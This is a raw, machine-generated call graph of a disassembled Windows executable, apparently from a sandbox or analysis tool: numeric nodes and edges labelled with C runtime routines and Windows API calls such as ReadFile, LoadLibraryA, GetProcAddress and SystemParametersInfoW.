102323->102327 102589 2d5c60 102324->102589 102326 2b4ede 102329 2b4bd0 102328->102329 102330 2b4c0c LoadLibraryA 102328->102330 102329->102284 102329->102285 102330->102329 102331 2b4c1d GetProcAddress 102330->102331 102331->102329 102334 2d527c __alloc_osfhnd 102332->102334 102333 2d528f 102381 2d8b28 58 API calls __getptd_noexit 102333->102381 102334->102333 102336 2d52c0 102334->102336 102351 2e04e8 102336->102351 102337 2d5294 102382 2d8db6 9 API calls _memcpy_s 102337->102382 102340 2d52c5 102341 2d52ce 102340->102341 102342 2d52db 102340->102342 102383 2d8b28 58 API calls __getptd_noexit 102341->102383 102344 2d5305 102342->102344 102345 2d52e5 102342->102345 102366 2e0607 102344->102366 102384 2d8b28 58 API calls __getptd_noexit 102345->102384 102349 2d529f __alloc_osfhnd @_EH4_CallFilterFunc@8 102349->102288 102352 2e04f4 __alloc_osfhnd 102351->102352 102353 2d9c0b __lock 58 API calls 102352->102353 102364 2e0502 102353->102364 102354 2e0576 102386 2e05fe 102354->102386 102355 2e057d 102391 2d881d 58 API calls 2 library calls 102355->102391 102358 2e0584 102358->102354 102392 2d9e2b InitializeCriticalSectionAndSpinCount 102358->102392 102359 2e05f3 __alloc_osfhnd 102359->102340 102361 2d9c93 __mtinitlocknum 58 API calls 102361->102364 102363 2e05aa EnterCriticalSection 102363->102354 102364->102354 102364->102355 102364->102361 102389 2d6c50 59 API calls __lock 102364->102389 102390 2d6cba LeaveCriticalSection LeaveCriticalSection _doexit 102364->102390 102375 2e0627 __wopenfile 102366->102375 102367 2e0641 102397 2d8b28 58 API calls __getptd_noexit 102367->102397 102368 2e07fc 102368->102367 102372 2e085f 102368->102372 102370 2e0646 102398 2d8db6 9 API calls _memcpy_s 102370->102398 102394 2e85a1 102372->102394 102373 2d5310 102385 2d5332 LeaveCriticalSection LeaveCriticalSection _fseek 102373->102385 102375->102367 102375->102368 102399 2d37cb 60 API calls 2 library calls 102375->102399 102377 2e07f5 102377->102368 102400 2d37cb 60 API calls 2 library calls 102377->102400 102379 2e0814 102379->102368 102401 2d37cb 60 API calls 2 library calls 102379->102401 102381->102337 102382->102349 102383->102349 102384->102349 102385->102349 102393 2d9d75 LeaveCriticalSection 102386->102393 102388 2e0605 102388->102359 102389->102364 102390->102364 102391->102358 102392->102363 102393->102388 102402 2e7d85 102394->102402 102396 2e85ba 102396->102373 102397->102370 102398->102373 102399->102377 102400->102379 102401->102368 102403 2e7d91 __alloc_osfhnd 102402->102403 102404 2e7da7 102403->102404 102407 2e7ddd 102403->102407 102405 2d8b28 _memcpy_s 58 API calls 102404->102405 102406 2e7dac 102405->102406 102408 2d8db6 _memcpy_s 9 API calls 102406->102408 102409 2e7e4e __wsopen_nolock 109 API calls 102407->102409 102411 2e7db6 __alloc_osfhnd 102408->102411 102410 2e7df9 102409->102410 102412 2e7e22 __wsopen_helper LeaveCriticalSection 102410->102412 102411->102396 102412->102411 102414 2b4b83 102413->102414 102415 2b4c3f LoadLibraryA 102413->102415 102414->102292 102414->102295 102415->102414 102416 2b4c50 GetProcAddress 102415->102416 102416->102414 102418 2b4ea3 FindResourceExW 102417->102418 102419 2b4ec0 102417->102419 102418->102419 102420 2ed933 LoadResource 102418->102420 102419->102301 102420->102419 102421 2ed948 SizeofResource 102420->102421 102421->102419 102422 2ed95c LockResource 102421->102422 102422->102419 102424 2ed9ab 102423->102424 102425 2b4ef4 102423->102425 102429 2d584d 102425->102429 102427 2b4f02 102427->102312 102428->102301 102432 2d5859 __alloc_osfhnd 102429->102432 102430 2d586b 102442 2d8b28 58 API calls __getptd_noexit 102430->102442 102432->102430 102433 2d5891 102432->102433 102444 2d6c11 102433->102444 102434 2d5870 102443 2d8db6 9 API calls _memcpy_s 102434->102443 102439 2d58a6 102451 2d58c8 LeaveCriticalSection LeaveCriticalSection _fseek 102439->102451 102441 2d587b __alloc_osfhnd 102441->102427 102442->102434 102443->102441 102445 2d6c21 102444->102445 102446 2d6c43 EnterCriticalSection 102444->102446 102445->102446 102447 2d6c29 102445->102447 102448 2d5897 102446->102448 102449 2d9c0b __lock 58 API calls 102447->102449 102450 2d57be 83 API calls 5 library calls 102448->102450 102449->102448 102450->102439 102451->102441 102455 2d55fd 102452->102455 102454 2b4f2e 102454->102320 102456 2d5609 __alloc_osfhnd 102455->102456 102457 2d564c 102456->102457 102458 2d5644 __alloc_osfhnd 102456->102458 102460 2d561f _memset 102456->102460 102459 2d6c11 __lock_file 59 API calls 102457->102459 102458->102454 102462 2d5652 102459->102462 102482 2d8b28 58 API calls __getptd_noexit 102460->102482 102468 2d541d 102462->102468 102463 2d5639 102483 2d8db6 9 API calls _memcpy_s 102463->102483 102470 2d5438 _memset 102468->102470 102475 2d5453 102468->102475 102469 2d5443 102580 2d8b28 58 API calls __getptd_noexit 102469->102580 102470->102469 102472 2d5493 102470->102472 102470->102475 102472->102475 102476 2d55a4 _memset 102472->102476 102485 2d46e6 102472->102485 102492 2e0e5b 102472->102492 102560 2e0ba7 102472->102560 102582 2e0cc8 58 API calls 3 library calls 102472->102582 102484 2d5686 LeaveCriticalSection LeaveCriticalSection _fseek 102475->102484 102583 2d8b28 58 API calls __getptd_noexit 102476->102583 102481 2d5448 102581 2d8db6 9 API calls _memcpy_s 102481->102581 102482->102463 102483->102458 102484->102458 102486 2d4705 102485->102486 102487 2d46f0 102485->102487 102486->102472 102488 2d8b28 _memcpy_s 58 API calls 102487->102488 102489 2d46f5 102488->102489 102490 2d8db6 _memcpy_s 9 API calls 102489->102490 102491 2d4700 102490->102491 102491->102472 102493 2e0e7c 102492->102493 102494 2e0e93 102492->102494 102495 2d8af4 __dosmaperr 58 API calls 102493->102495 102496 2e15cb 102494->102496 102501 2e0ecd 102494->102501 102498 2e0e81 102495->102498 102497 2d8af4 __dosmaperr 58 API calls 102496->102497 102499 2e15d0 102497->102499 102500 2d8b28 _memcpy_s 58 API calls 102498->102500 102503 2d8b28 _memcpy_s 58 API calls 102499->102503 102540 2e0e88 102500->102540 102502 2e0ed5 102501->102502 102508 2e0eec 102501->102508 102504 2d8af4 __dosmaperr 58 API calls 102502->102504 102505 2e0ee1 102503->102505 102506 2e0eda 102504->102506 102507 2d8db6 _memcpy_s 9 API calls 102505->102507 102510 2d8b28 _memcpy_s 58 API calls 102506->102510 102507->102540 102509 2e0f01 102508->102509 102512 2e0f1b 102508->102512 102513 2e0f39 102508->102513 102508->102540 102511 2d8af4 __dosmaperr 58 API calls 102509->102511 102510->102505 102511->102506 102512->102509 102515 2e0f26 102512->102515 102514 2d881d __malloc_crt 58 API calls 102513->102514 102516 2e0f49 102514->102516 102517 2e5c6b __flswbuf 58 API calls 102515->102517 102518 2e0f6c 102516->102518 102519 2e0f51 102516->102519 102520 2e103a 102517->102520 102523 2e18c1 __lseeki64_nolock 60 API calls 102518->102523 102521 2d8b28 _memcpy_s 58 API calls 102519->102521 102522 2e10b3 ReadFile 102520->102522 102527 2e1050 GetConsoleMode 102520->102527 102524 2e0f56 102521->102524 102525 2e10d5 102522->102525 102526 2e1593 GetLastError 102522->102526 102523->102515 102528 2d8af4 __dosmaperr 58 API calls 102524->102528 102525->102526 102533 2e10a5 102525->102533 102529 2e1093 102526->102529 102530 2e15a0 102526->102530 102531 2e1064 102527->102531 102532 2e10b0 102527->102532 102528->102540 102537 2d8b07 __dosmaperr 58 API calls 102529->102537 102547 2e1099 102529->102547 102534 2d8b28 _memcpy_s 58 API calls 102530->102534 102531->102532 102535 2e106a ReadConsoleW 102531->102535 102532->102522 102543 2e1377 102533->102543 102545 2e110a 102533->102545 102533->102547 102538 2e15a5 102534->102538 102535->102533 102536 2e108d GetLastError 102535->102536 102536->102529 102537->102547 102539 2d8af4 __dosmaperr 58 API calls 102538->102539 102539->102547 102540->102472 102541 2d2d55 _free 58 API calls 102541->102540 102542 2e11f7 102542->102547 102550 2e12b4 102542->102550 102551 2e12a4 102542->102551 102556 2e1264 MultiByteToWideChar 102542->102556 102543->102547 102548 2e147d ReadFile 102543->102548 102545->102542 102546 2e1176 ReadFile 102545->102546 102549 2e1197 GetLastError 102546->102549 102559 2e11a1 102546->102559 102547->102540 102547->102541 102552 2e14a0 GetLastError 102548->102552 102557 2e14ae 102548->102557 102549->102559 102554 2e18c1 __lseeki64_nolock 60 API calls 102550->102554 102550->102556 102553 2d8b28 _memcpy_s 58 API calls 102551->102553 102552->102557 102553->102547 102554->102556 102555 2e18c1 __lseeki64_nolock 60 API calls 102555->102559 102556->102536 102556->102547 102557->102543 102558 2e18c1 __lseeki64_nolock 60 API calls 102557->102558 102558->102557 102559->102545 102559->102555 102561 2e0bb2 102560->102561 102564 2e0bc7 102560->102564 102562 2d8b28 _memcpy_s 58 API calls 102561->102562 102563 2e0bb7 102562->102563 102565 2d8db6 _memcpy_s 9 API calls 102563->102565 102566 2e5fe4 __getbuf 58 API calls 102564->102566 102567 2e0bfc 102564->102567 102574 2e0bc2 102564->102574 102565->102574 102566->102567 102568 2d46e6 __fclose_nolock 58 API calls 102567->102568 102569 2e0c10 102568->102569 102570 2e0d47 __read 72 API calls 102569->102570 102571 2e0c17 102570->102571 102572 2d46e6 __fclose_nolock 58 API calls 102571->102572 102571->102574 102573 2e0c3a 102572->102573 102573->102574 102575 2d46e6 __fclose_nolock 58 API calls 102573->102575 102574->102472 102576 2e0c46 102575->102576 102576->102574 102577 2d46e6 __fclose_nolock 58 API calls 102576->102577 102578 2e0c53 102577->102578 102579 2d46e6 __fclose_nolock 58 API calls 102578->102579 102579->102574 102580->102481 102581->102475 102582->102472 102583->102481 102587 2d520a GetSystemTimeAsFileTime 102584->102587 102586 318f6e 102586->102322 102588 2d5238 __aulldiv 102587->102588 102588->102586 102590 2d5c6c __alloc_osfhnd 102589->102590 102591 2d5c7e 102590->102591 102592 2d5c93 102590->102592 102603 2d8b28 58 API calls __getptd_noexit 102591->102603 102594 2d6c11 __lock_file 59 API calls 102592->102594 102596 2d5c99 102594->102596 102595 2d5c83 102604 2d8db6 9 API calls _memcpy_s 102595->102604 102605 2d58d0 67 API calls 6 library calls 102596->102605 102599 2d5ca4 102606 2d5cc4 LeaveCriticalSection LeaveCriticalSection _fseek 102599->102606 102601 2d5cb6 102602 2d5c8e __alloc_osfhnd 102601->102602 102602->102326 102603->102595 102604->102602 102605->102599 102606->102601 102607->102159 102608->102205 102609->102207 102610->102258 102612 2d486f __alloc_osfhnd 102611->102612 102613 2d488d 102612->102613 102614 2d48a5 102612->102614 102617 2d489d __alloc_osfhnd 102612->102617 102691 2d8b28 58 API calls __getptd_noexit 102613->102691 102615 2d6c11 __lock_file 59 API calls 102614->102615 102618 2d48ab 102615->102618 102617->102269 102679 2d470a 102618->102679 102619 2d4892 102692 2d8db6 9 API calls _memcpy_s 102619->102692 102625 2d53b2 __alloc_osfhnd 102624->102625 102626 2d53de 102625->102626 102627 2d53c6 102625->102627 102630 2d6c11 __lock_file 59 API calls 102626->102630 102634 2d53d6 __alloc_osfhnd 102626->102634 102861 2d8b28 58 API calls __getptd_noexit 102627->102861 102629 2d53cb 102862 2d8db6 9 API calls _memcpy_s 102629->102862 102632 2d53f0 102630->102632 102845 2d533a 102632->102845 102634->102262 102638 3198c8 SetFileTime CloseHandle 102637->102638 102639 3198de 102637->102639 102638->102639 102639->102239 102641 319748 __tzset_nolock _wcscmp 102640->102641 102642 2b4f0b 74 API calls 102641->102642 102643 319210 102641->102643 102644 319109 GetSystemTimeAsFileTime 102641->102644 102645 2b4ee5 85 API calls 102641->102645 102642->102641 102643->102239 102646 2d40fb 58 API calls __wsplitpath_helper 102643->102646 102644->102641 102645->102641 102646->102241 102647->102249 102649 318b11 102648->102649 102650 318b1f 102648->102650 102651 2d525b 115 API calls 102649->102651 102652 318b64 102650->102652 102653 2d525b 115 API calls 102650->102653 102678 318b28 102650->102678 102651->102650 102934 318d91 102652->102934 102654 318b49 102653->102654 102654->102652 102657 318b52 102654->102657 102660 2d53a6 __fcloseall 83 API calls 102657->102660 102657->102678 102660->102678 102678->102268 102678->102275 102680 2d4737 102679->102680 102683 2d4719 102679->102683 102693 2d48dd LeaveCriticalSection LeaveCriticalSection _fseek 102680->102693 102681 2d4727 102722 2d8b28 58 API calls __getptd_noexit 102681->102722 102683->102680 102683->102681 102685 2d4751 _memmove 102683->102685 102684 2d472c 102723 2d8db6 9 API calls _memcpy_s 102684->102723 102685->102680 102689 2d46e6 __fclose_nolock 58 API calls 102685->102689 102694 2dd886 102685->102694 102724 2d4a3d 102685->102724 102730 2dae1e 78 API calls 6 library calls 102685->102730 102689->102685 102691->102619 102692->102617 102693->102617 102695 2dd892 __alloc_osfhnd 102694->102695 102696 2dd89f 102695->102696 102697 2dd8b6 102695->102697 102804 2d8af4 58 API calls __getptd_noexit 102696->102804 102698 2dd955 102697->102698 102700 2dd8ca 102697->102700 102810 2d8af4 58 API calls __getptd_noexit 102698->102810 102704 2dd8e8 102700->102704 102705 2dd8f2 102700->102705 102702 2dd8a4 102806 2d8af4 58 API calls __getptd_noexit 102704->102806 102731 2dd206 102705->102731 102722->102684 102723->102680 102725 2d4a50 102724->102725 102726 2d4a74 102724->102726 102725->102726 102727 2d46e6 __fclose_nolock 58 API calls 102725->102727 102726->102685 102728 2d4a6d 102727->102728 102729 2dd886 __write 78 API calls 102728->102729 102729->102726 102730->102685 102804->102702 102846 2d535d 102845->102846 102847 2d5349 102845->102847 102849 2d4a3d __flush 78 API calls 102846->102849 102859 2d5359 102846->102859 102894 2d8b28 58 API calls __getptd_noexit 102847->102894 102851 2d5369 102849->102851 102850 2d534e 102895 2d8db6 9 API calls _memcpy_s 102850->102895 102864 2e0b77 102851->102864 102855 2d46e6 __fclose_nolock 58 API calls 102863 2d5415 LeaveCriticalSection LeaveCriticalSection _fseek 102859->102863 102861->102629 102862->102634 102863->102634 102865 2d5371 102864->102865 102866 2e0b84 102864->102866 102865->102855 102866->102865 102867 2d2d55 _free 58 API calls 102866->102867 102867->102865 102894->102850 102895->102859 102935 318db6 102934->102935 102937 318d9f __tzset_nolock _memmove 102934->102937 102977 2b7a16 59 API calls 102976->102977 102993 2b6265 102977->102993 102978 2b646a 103004 2b750f 59 API calls 2 library calls 102978->103004 102980 2b6484 Mailbox 102980->102072 102983 2edff6 103007 30f8aa 91 API calls 4 library calls 102983->103007 102984 2b750f 59 API calls 102984->102993 102988 2b7d8c 59 API calls 102988->102993 102989 2ee004 103008 2b750f 59 API calls 2 library calls 102989->103008 102991 2ee01a 102991->102980 102992 2b6799 _memmove 103009 30f8aa 91 API calls 4 library calls 102992->103009 102993->102978 102993->102983 102993->102984 102993->102988 102993->102992 102994 2edf92 102993->102994 102998 2b7e4f 59 API calls 102993->102998 103002 2b5f6c 60 API calls 102993->103002 103003 2b5d41 59 API calls Mailbox 102993->103003 103005 2b5e72 60 API calls 102993->103005 103006 2b7924 59 API calls 2 library calls 102993->103006 102995 2b8029 59 API calls 102994->102995 102996 2edf9d 102995->102996 103000 2d0db6 Mailbox 59 API calls 102996->103000 102999 2b643b CharUpperBuffW 102998->102999 102999->102993 103000->102992 103001->102075 103002->102993 103003->102993 103004->102980 103005->102993 103006->102993 103007->102989 103008->102991 103009->102980 103010->101864 103011->101896 103012 2d7c56 103013 2d7c62 __alloc_osfhnd 103012->103013 103049 2d9e08 GetStartupInfoW 103013->103049 103015 2d7c67 103051 2d8b7c GetProcessHeap 103015->103051 103017 2d7cbf 103018 2d7cca 103017->103018 103134 2d7da6 58 API calls 3 library calls 103017->103134 103052 2d9ae6 103018->103052 103021 2d7cd0 103022 2d7cdb __RTC_Initialize 103021->103022 103135 2d7da6 58 API calls 3 library calls 103021->103135 103073 2dd5d2 103022->103073 103025 2d7cea 103026 2d7cf6 GetCommandLineW 103025->103026 103136 2d7da6 58 API calls 3 library calls 103025->103136 103092 2e4f23 GetEnvironmentStringsW 103026->103092 103029 2d7cf5 103029->103026 103032 2d7d10 103033 2d7d1b 103032->103033 103137 2d30b5 58 API calls 3 library calls 103032->103137 103102 2e4d58 103033->103102 103036 2d7d21 103037 2d7d2c 103036->103037 103138 2d30b5 58 API calls 3 library calls 103036->103138 103116 2d30ef 103037->103116 103040 2d7d34 103041 2d7d3f __wwincmdln 103040->103041 103139 2d30b5 58 API calls 3 library calls 103040->103139 103122 2b47d0 103041->103122 103044 2d7d53 103045 2d7d62 103044->103045 103140 2d3358 58 API calls _doexit 103044->103140 103141 2d30e0 58 API calls _doexit 103045->103141 103048 2d7d67 __alloc_osfhnd 103050 2d9e1e 103049->103050 103050->103015 103051->103017 103142 2d3187 36 API calls 2 library calls 103052->103142 103054 2d9aeb 103143 2d9d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 103054->103143 103056 2d9af0 103057 2d9af4 103056->103057 103145 2d9d8a TlsAlloc 103056->103145 103144 2d9b5c 61 API calls 2 library calls 103057->103144 103060 2d9af9 103060->103021 103061 2d9b06 103061->103057 103062 2d9b11 103061->103062 103146 2d87d5 103062->103146 103065 2d9b53 103154 2d9b5c 61 API calls 2 library calls 103065->103154 103068 2d9b32 103068->103065 103070 2d9b38 103068->103070 103069 2d9b58 103069->103021 103153 2d9a33 58 API calls 4 library calls 103070->103153 103072 2d9b40 GetCurrentThreadId 103072->103021 103074 2dd5de __alloc_osfhnd 103073->103074 103075 2d9c0b __lock 58 API calls 103074->103075 103076 2dd5e5 103075->103076 103077 2d87d5 __calloc_crt 58 API calls 103076->103077 103079 2dd5f6 103077->103079 103078 2dd661 GetStartupInfoW 103086 2dd676 103078->103086 103089 2dd7a5 103078->103089 103079->103078 103080 2dd601 __alloc_osfhnd @_EH4_CallFilterFunc@8 103079->103080 103080->103025 103081 2dd86d 103168 2dd87d LeaveCriticalSection _doexit 103081->103168 103083 2d87d5 __calloc_crt 58 API calls 103083->103086 103084 2dd7f2 GetStdHandle 103084->103089 103085 2dd805 GetFileType 103085->103089 103086->103083 103088 2dd6c4 103086->103088 103086->103089 103087 2dd6f8 GetFileType 103087->103088 103088->103087 103088->103089 103166 2d9e2b InitializeCriticalSectionAndSpinCount 103088->103166 103089->103081 103089->103084 103089->103085 103167 2d9e2b InitializeCriticalSectionAndSpinCount 103089->103167 103093 2d7d06 103092->103093 103094 2e4f34 103092->103094 103098 2e4b1b GetModuleFileNameW 103093->103098 103169 2d881d 58 API calls 2 library calls 103094->103169 103096 2e4f5a _memmove 103097 2e4f70 FreeEnvironmentStringsW 103096->103097 103097->103093 103099 2e4b4f _wparse_cmdline 103098->103099 103101 2e4b8f _wparse_cmdline 103099->103101 103170 2d881d 58 API calls 2 library calls 103099->103170 103101->103032 103103 2e4d69 103102->103103 103104 2e4d71 __NMSG_WRITE 103102->103104 103103->103036 103105 2d87d5 __calloc_crt 58 API calls 103104->103105 103106 2e4d9a __NMSG_WRITE 103105->103106 103106->103103 103108 2d87d5 __calloc_crt 58 API calls 103106->103108 103109 2e4df1 103106->103109 103110 2e4e16 103106->103110 103113 2e4e2d 103106->103113 103171 2e4607 58 API calls _memcpy_s 103106->103171 103107 2d2d55 _free 58 API calls 103107->103103 103108->103106 103109->103107 103111 2d2d55 _free 58 API calls 103110->103111 103111->103103 103172 2d8dc6 IsProcessorFeaturePresent 103113->103172 103115 2e4e39 103115->103036 103117 2d30fb __IsNonwritableInCurrentImage 103116->103117 103187 2da4d1 103117->103187 103119 2d3119 __initterm_e 103120 2d2d40 __cinit 67 API calls 103119->103120 103121 2d3138 __cinit __IsNonwritableInCurrentImage 103119->103121 103120->103121 103121->103040 103123 2b47ea 103122->103123 103133 2b4889 103122->103133 103124 2b4824 IsThemeActive 103123->103124 103190 2d336c 103124->103190 103128 2b4850 103202 2b48fd SystemParametersInfoW SystemParametersInfoW 103128->103202 103130 2b485c 103203 2b3b3a 103130->103203 103132 2b4864 SystemParametersInfoW 103132->103133 103133->103044 103134->103018 103135->103022 103136->103029 103140->103045 103141->103048 103142->103054 103143->103056 103144->103060 103145->103061 103147 2d87dc 103146->103147 103149 2d8817 103147->103149 103151 2d87fa 103147->103151 103155 2e51f6 103147->103155 103149->103065 103152 2d9de6 TlsSetValue 103149->103152 103151->103147 103151->103149 103163 2da132 Sleep 103151->103163 103152->103068 103153->103072 103154->103069 103156 2e521c 103155->103156 103157 2e5201 103155->103157 103160 2e522c HeapAlloc 103156->103160 103161 2e5212 103156->103161 103165 2d33a1 DecodePointer 103156->103165 103157->103156 103158 2e520d 103157->103158 103164 2d8b28 58 API calls __getptd_noexit 103158->103164 103160->103156 103160->103161 103161->103147 103163->103151 103164->103161 103165->103156 103166->103088 103167->103089 103168->103080 103169->103096 103170->103101 103171->103106 103173 2d8dd1 103172->103173 103178 2d8c59 103173->103178 103177 2d8dec 103177->103115 103179 2d8c73 _memset ___raise_securityfailure 103178->103179 103180 2d8c93 IsDebuggerPresent 103179->103180 103186 2da155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103180->103186 103182 2dc5f6 __fputwc_nolock 6 API calls 103184 2d8d7a 103182->103184 103183 2d8d57 ___raise_securityfailure 103183->103182 103185 2da140 GetCurrentProcess TerminateProcess 103184->103185 103185->103177 103186->103183 103188 2da4d4 EncodePointer 103187->103188 103188->103188 103189 2da4ee 103188->103189 103189->103119 103191 2d9c0b __lock 58 API calls 103190->103191 103192 2d3377 DecodePointer EncodePointer 103191->103192 103255 2d9d75 LeaveCriticalSection 103192->103255 103194 2b4849 103195 2d33d4 103194->103195 103196 2d33de 103195->103196 103197 2d33f8 103195->103197 103196->103197 103256 2d8b28 58 API calls __getptd_noexit 103196->103256 103197->103128 103199 2d33e8 103257 2d8db6 9 API calls _memcpy_s 103199->103257 103201 2d33f3 103201->103128 103202->103130 103204 2b3b47 __write_nolock 103203->103204 103205 2b7667 59 API calls 103204->103205 103206 2b3b51 GetCurrentDirectoryW 103205->103206 103258 2b3766 103206->103258 103208 2b3b7a IsDebuggerPresent 103209 2b3b88 103208->103209 103210 2ed272 MessageBoxA 103208->103210 103211 2b3c61 103209->103211 103212 2ed28c 103209->103212 103213 2b3ba5 103209->103213 103210->103212 103214 2b3c68 SetCurrentDirectoryW 103211->103214 103380 2b7213 59 API calls Mailbox 103212->103380 103339 2b7285 103213->103339 103217 2b3c75 Mailbox 103214->103217 103217->103132 103218 2ed29c 103223 2ed2b2 SetCurrentDirectoryW 103218->103223 103220 2b3bc3 GetFullPathNameW 103221 2b7bcc 59 API calls 103220->103221 103223->103217 103255->103194 103256->103199 103257->103201 103259 2b7667 59 API calls 103258->103259 103260 2b377c 103259->103260 103382 2b3d31 103260->103382 103262 2b379a 103263 2b4706 61 API calls 103262->103263 103264 2b37ae 103263->103264 103265 2b7de1 59 API calls 103264->103265 103266 2b37bb 103265->103266 103267 2b4ddd 136 API calls 103266->103267 103268 2b37d4 103267->103268 103269 2b37dc Mailbox 103268->103269 103270 2ed173 103268->103270 103273 2b8047 59 API calls 103269->103273 103424 31955b 103270->103424 103277 2b37ef 103273->103277 103274 2ed192 103276 2d2d55 _free 58 API calls 103274->103276 103275 2b4e4a 84 API calls 103275->103274 103278 2ed19f 103276->103278 103396 2b928a 103277->103396 103280 2b4e4a 84 API calls 103278->103280 103282 2ed1a8 103280->103282 103286 2b3ed0 59 API calls 103282->103286 103283 2b7de1 59 API calls 103284 2b3808 103283->103284 103285 2b84c0 69 API calls 103284->103285 103287 2b381a Mailbox 103285->103287 103288 2ed1c3 103286->103288 103289 2b7de1 59 API calls 103287->103289 103290 2b3ed0 59 API calls 103288->103290 103291 2b3840 103289->103291 103293 2ed1df 103290->103293 103292 2b84c0 69 API calls 103291->103292 103296 2b384f Mailbox 103292->103296 103294 2b4706 61 API calls 103293->103294 103295 2ed204 103294->103295 103297 2b3ed0 59 API calls 103295->103297 103299 2b7667 59 API calls 103296->103299 103298 2ed210 103297->103298 103300 2b8047 59 API calls 103298->103300 103301 2b386d 103299->103301 103302 2ed21e 103300->103302 103399 2b3ed0 103301->103399 103304 2b3ed0 59 API calls 103302->103304 103306 2ed22d 103304->103306 103312 2b8047 59 API calls 103306->103312 103308 2b3887 103308->103282 103309 2b3891 103308->103309 103310 2d2efd _W_store_winword 60 API calls 103309->103310 103311 2b389c 103310->103311 103311->103288 103313 2b38a6 103311->103313 103315 2ed24f 103312->103315 103314 2d2efd _W_store_winword 60 API calls 103313->103314 103317 2b38b1 103314->103317 103316 2b3ed0 59 API calls 103315->103316 103318 2ed25c 103316->103318 103317->103293 103319 2b38bb 103317->103319 103318->103318 103320 2d2efd _W_store_winword 60 API calls 103319->103320 103321 2b38c6 103320->103321 103321->103306 103322 2b3907 103321->103322 103324 2b3ed0 59 API calls 103321->103324 103322->103306 103323 2b3914 103322->103323 103326 2b92ce 59 API calls 103323->103326 103325 2b38ea 103324->103325 103328 2b8047 59 API calls 103325->103328 103327 2b3924 103326->103327 103329 2b9050 59 API calls 103327->103329 103330 2b38f8 103328->103330 103331 2b3932 103329->103331 103332 2b3ed0 59 API calls 103330->103332 103415 2b8ee0 103331->103415 103332->103322 103334 2b928a 59 API calls 103336 2b394f 103334->103336 103335 2b8ee0 60 API calls 103335->103336 103336->103334 103336->103335 103337 2b3ed0 59 API calls 103336->103337 103338 2b3995 Mailbox 103336->103338 103337->103336 103338->103208 103340 2b7292 __write_nolock 103339->103340 103341 2b72ab 103340->103341 103342 2eea22 _memset 103340->103342 103343 2b4750 60 API calls 103341->103343 103345 2eea3e GetOpenFileNameW 103342->103345 103344 2b72b4 103343->103344 103463 2d0791 103344->103463 103347 2eea8d 103345->103347 103349 2b7bcc 59 API calls 103347->103349 103351 2eeaa2 103349->103351 103351->103351 103352 2b72c9 103481 2b686a 103352->103481 103380->103218 103383 2b3d3e __write_nolock 103382->103383 103384 2b7bcc 59 API calls 103383->103384 103388 2b3ea4 Mailbox 103383->103388 103386 2b3d70 103384->103386 103385 2b79f2 59 API calls 103385->103386 103386->103385 103394 2b3da6 Mailbox 103386->103394 103387 2b3e77 103387->103388 103389 2b7de1 59 API calls 103387->103389 103388->103262 103391 2b3e98 103389->103391 103390 2b7de1 59 API calls 103390->103394 103393 2b3f74 59 API calls 103391->103393 103392 2b79f2 59 API calls 103392->103394 103393->103388 103394->103387 103394->103388 103394->103390 103394->103392 103395 2b3f74 59 API calls 103394->103395 103395->103394 103397 2d0db6 Mailbox 59 API calls 103396->103397 103398 2b37fb 103397->103398 103398->103283 103400 2b3eda 103399->103400 103401 2b3ef3 103399->103401 103402 2b8047 59 API calls 103400->103402 103403 2b7bcc 59 API calls 103401->103403 103404 2b3879 103402->103404 103403->103404 103405 2d2efd 103404->103405 103406 2d2f7e 103405->103406 103407 2d2f09 103405->103407 103461 2d2f90 60 API calls 3 library calls 103406->103461 103413 2d2f2e 103407->103413 103459 2d8b28 58 API calls __getptd_noexit 103407->103459 103410 2d2f8b 103410->103308 103411 2d2f15 103460 2d8db6 9 API calls _memcpy_s 103411->103460 103413->103308 103414 2d2f20 103414->103308 103416 2ef17c 103415->103416 103418 2b8ef7 103415->103418 103416->103418 103462 2b8bdb 59 API calls Mailbox 103416->103462 103419 2b8ff8 103418->103419 103420 2b9040 103418->103420 103423 2b8fff 103418->103423 103422 2d0db6 Mailbox 59 API calls 103419->103422 103421 2b9d3c 60 API calls 103420->103421 103421->103423 103422->103423 103423->103336 103425 2b4ee5 85 API calls 103424->103425 103426 3195ca 103425->103426 103427 319734 96 API calls 103426->103427 103428 3195dc 103427->103428 103429 2b4f0b 74 API calls 103428->103429 103455 2ed186 103428->103455 103430 3195f7 103429->103430 103431 2b4f0b 74 API calls 103430->103431 103432 319607 103431->103432 103433 2b4f0b 74 API calls 103432->103433 103434 319622 103433->103434 103435 2b4f0b 74 API calls 103434->103435 103436 31963d 103435->103436 103437 2b4ee5 85 API calls 103436->103437 103438 319654 103437->103438 103439 2d571c std::exception::_Copy_str 58 API calls 103438->103439 103440 31965b 103439->103440 103441 2d571c std::exception::_Copy_str 58 API calls 103440->103441 103442 319665 103441->103442 103443 2b4f0b 74 API calls 103442->103443 103444 319679 103443->103444 103445 319109 GetSystemTimeAsFileTime 103444->103445 103446 31968c 103445->103446 103447 3196a1 103446->103447 103448 3196b6 103446->103448 103449 2d2d55 _free 58 API calls 103447->103449 103450 31971b 103448->103450 103451 3196bc 103448->103451 103453 3196a7 103449->103453 103452 2d2d55 _free 58 API calls 103450->103452 103454 318b06 116 API calls 103451->103454 103452->103455 103456 2d2d55 _free 58 API calls 103453->103456 103457 319713 103454->103457 103455->103274 103455->103275 103456->103455 103458 2d2d55 _free 58 API calls 103457->103458 103458->103455 103459->103411 103460->103414 103461->103410 103462->103418 103464 2d079e __write_nolock 103463->103464 103465 2d079f GetLongPathNameW 103464->103465 103466 2b7bcc 59 API calls 103465->103466 103467 2b72bd 103466->103467 103468 2b700b 103467->103468 103469 2b7667 59 API calls 103468->103469 103470 2b701d 103469->103470 103471 2b4750 60 API calls 103470->103471 103472 2b7028 103471->103472 103473 2b7033 103472->103473 103474 2ee885 103472->103474 103476 2b3f74 59 API calls 103473->103476 103478 2ee89f 103474->103478 103521 2b7908 61 API calls 103474->103521 103477 2b703f 103476->103477 103515 2b34c2 103477->103515 103480 2b7052 Mailbox 103480->103352 103482 2b4ddd 136 API calls 103481->103482 103483 2b688f 103482->103483 103484 2ee031 103483->103484 103486 2b4ddd 136 API calls 103483->103486 103485 31955b 122 API calls 103484->103485 103487 2ee046 103485->103487 103488 2b68a3 103486->103488 103489 2ee04a 103487->103489 103490 2ee067 103487->103490 103488->103484 103491 2b68ab 103488->103491 103494 2b4e4a 84 API calls 103489->103494 103495 2d0db6 Mailbox 59 API calls 103490->103495 103492 2ee052 103491->103492 103493 2b68b7 103491->103493 103615 3142f8 90 API calls _wprintf 103492->103615 103522 2b6a8c 103493->103522 103494->103492 103514 2ee0ac Mailbox 